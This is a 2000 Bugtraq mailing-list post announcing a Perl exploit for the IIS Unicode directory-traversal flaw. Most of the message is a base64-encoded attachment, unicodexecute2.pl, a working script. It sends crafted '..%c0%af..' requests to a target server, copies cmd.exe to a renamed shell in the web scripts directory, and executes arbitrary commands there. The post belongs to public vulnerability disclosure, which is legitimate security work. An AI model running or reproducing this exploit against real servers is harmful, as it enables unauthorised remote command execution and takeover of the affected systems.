[17363] in bugtraq
Unicode exploit - version 2
daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Thu Oct 26 14:57:03 2000
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-2047865686-972555134=:3598"
Message-ID: <Pine.BSF.4.21.0010261201040.3598-200000@wips.sensepost.com>
Date: Thu, 26 Oct 2000 12:12:14 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--0-2047865686-972555134=:3598
Content-Type: TEXT/PLAIN; charset=US-ASCII
All,
http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806 applies:
After the discussion on Bugtraq et al on the IIS Unicode flaw, this PERL
script will check the existance of an 'alternative' cmd.exe, and pass all
commands to the alternative shell, or creates it if it does not exists - making
redirection of commands possible.
Credit to all that contributed.
Greetings,
Roelof.
------------------------------------------------------
Roelof W Temmingh SensePost IT security
roelof@sensepost.com +27 83 448 6996
http://www.sensepost.com
--0-2047865686-972555134=:3598
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="unicodexecute2.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.21.0010261212140.3598@wips.sensepost.com>
Content-Description:
Content-Disposition: attachment; filename="unicodexecute2.pl"
IyEvdXNyL2Jpbi9wZXJsDQojIFNlZSBodHRwOi8vd3d3LnNlY3VyaXR5Zm9j
dXMuY29tL3ZkYi9ib3R0b20uaHRtbD9zZWN0aW9uPWV4cGxvaXQmdmlkPTE4
MDYNCiMgVmVyeSBzaW1wbGUgUEVSTCBzY3JpcHQgdG8gZXhlY3V0ZSBjb21t
YW5kcyBvbiBJSVMgVW5pY29kZSB2dWxuZXJhYmxlIHNlcnZlcnMNCiMgVXNl
IHBvcnQgbnVtYmVyIHdpdGggU1NMcHJveHkgZm9yIHRlc3RpbmcgU1NMIHNp
dGVzDQojIFVzYWdlOiB1bmljb2RleGVjdXRlMiBJUDpwb3J0IGNvbW1hbmQN
CiMgT25seSBtYWtlcyB1c2Ugb2YgIlNvY2tldCIgbGlicmFyeQ0KIw0KIyBO
ZXcgaW4gdmVyc2lvbjI6DQojIENvcHkgdGhlIGNtZC5leGUgdG8gc29tZXRo
aW5nIGVsc2UsIGFuZCB0aGVuIHVzZSBpdC4NCiMgVGhlIHNjcmlwdCBjaGVj
a3MgZm9yIHRoaXMuDQojIFRobnggdG8gc2VjdXJpdHlAbnNmb2N1cy5jb20g
Zm9yIGRpc2NvdmVyaW5nIHRoZSBjbWQuZXhlIGNvcHkgcGFydA0KIw0KIyBS
b2Vsb2YgVGVtbWluZ2ggMjAwMC8xMC8yNg0KIyByb2Vsb2ZAc2Vuc2Vwb3N0
LmNvbSBodHRwOi8vd3d3LnNlbnNlcG9zdC5jb20NCg0KdXNlIFNvY2tldDsN
CiMgLS0tLS0tLS0tLS0tLS1pbml0DQppZiAoJCNBUkdWPDEpIHtkaWUgIlVz
YWdlOiB1bmljb2RleGVjdXRlIElQOnBvcnQgY29tbWFuZFxuIjt9DQooJGhv
c3QsJHBvcnQpPXNwbGl0KC86LyxAQVJHVlswXSk7DQokdGFyZ2V0ID0gaW5l
dF9hdG9uKCRob3N0KTsNCg0KIyAtLS0tLS0tLS0tLS0tLXRlc3QgaWYgY21k
IGhhcyBiZWVuIGNvcGllZDoNCiRmYWlsZWQ9MTsNCiRjb21tYW5kPSJkaXIi
Ow0KQHJlc3VsdHM9c2VuZHJhdygiR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4v
d2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyskY29tbWFuZCBIVFRQLzEuMFxy
XG5cclxuIik7DQpmb3JlYWNoICRsaW5lIChAcmVzdWx0cyl7DQogaWYgKCRs
aW5lID1+IC9zZW5zZXBvc3QuZXhlLykgeyRmYWlsZWQ9MDt9DQp9DQokZmFp
bGVkMj0xOw0KaWYgKCRmYWlsZWQ9PTEpIHsgDQogcHJpbnQgIlNlbnNlcG9z
dC5leGUgbm90IGZvdW5kIC0gQ29weWluZyBDTUQuLi5cbiI7DQogJGNvbW1h
bmQ9ImNvcHkgYzpcXHdpbm50XFxzeXN0ZW0zMlxcY21kLmV4ZSBzZW5zZXBv
c3QuZXhlIjsNCiAkY29tbWFuZD1+cy8gL1wlMjAvZzsNCiBAcmVzdWx0czI9
c2VuZHJhdygiR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVt
MzIvY21kLmV4ZT8vYyskY29tbWFuZCBIVFRQLzEuMFxyXG5cclxuIik7DQog
Zm9yZWFjaCAkbGluZTIgKEByZXN1bHRzMil7DQogIGlmICgoJGxpbmUyID1+
IC9jb3BpZWQvICkpIHskZmFpbGVkMj0wO30NCiB9DQogaWYgKCRmYWlsZWQy
PT0xKSB7ZGllICJDb3B5IG9mIENNRCBmYWlsZWQgLSBpbnNwZWN0IG1hbnVh
bGx5OlxuQHJlc3VsdHMyXG5cbiJ9Ow0KfSANCg0KIyAtLS0tLS0tLS0tLS0g
d2UgY2FuIGFzc3VtZSB0aGF0IHRoZSBjbWQuZXhlIGlzIGNvcGllZCBmcm9t
IGhlcmUuLg0KJGNvbW1hbmQ9QEFSR1ZbMV07DQpwcmludCAiU2Vuc2Vwb3N0
LmV4ZSBmb3VuZCAtIEV4ZWN1dGluZyBbJGNvbW1hbmRdIG9uICRob3N0OiRw
b3J0XG4iOw0KJGNvbW1hbmQ9fnMvIC9cJTIwL2c7DQpteSBAcmVzdWx0cz1z
ZW5kcmF3KCJHRVQgL3NjcmlwdHMvLi4lYzAlYWYuLi9pbmV0cHViL3Njcmlw
dHMvc2Vuc2Vwb3N0LmV4ZT8vYyskY29tbWFuZCBIVFRQLzEuMFxyXG5cclxu
Iik7DQpwcmludCBAcmVzdWx0czsNCg0KIyAtLS0tLS0tLS0tLS0tIFNlbmRy
YXcgLSB0aGFueCBSRlAgcmZwQHdpcmV0cmlwLm5ldA0Kc3ViIHNlbmRyYXcg
eyAgICMgdGhpcyBzYXZlcyB0aGUgd2hvbGUgdHJhbnNhY3Rpb24gYW55d2F5
DQogICAgICAgIG15ICgkcHN0cik9QF87DQogICAgICAgIHNvY2tldChTLFBG
X0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpfHwwKSB8
fA0KICAgICAgICAgICAgICAgIGRpZSgiU29ja2V0IHByb2JsZW1zXG4iKTsN
CiAgICAgICAgaWYoY29ubmVjdChTLHBhY2sgIlNuQTR4OCIsMiwkcG9ydCwk
dGFyZ2V0KSl7DQogICAgICAgICAgICAgICAgbXkgQGluOw0KICAgICAgICAg
ICAgICAgIHNlbGVjdChTKTsgICAgICAkfD0xOyAgIHByaW50ICRwc3RyOw0K
ICAgICAgICAgICAgICAgIHdoaWxlKDxTPil7IHB1c2ggQGluLCAkXzt9DQog
ICAgICAgICAgICAgICAgc2VsZWN0KFNURE9VVCk7IGNsb3NlKFMpOyByZXR1
cm4gQGluOw0KICAgICAgICB9IGVsc2UgeyBkaWUoIkNhbid0IGNvbm5lY3Qu
Li5cbiIpOyB9DQp9DQojIFNwaWRlcm1hcms6IHNlbnNlcG9zdGRhdGENCg0K
DQo=
--0-2047865686-972555134=:3598--
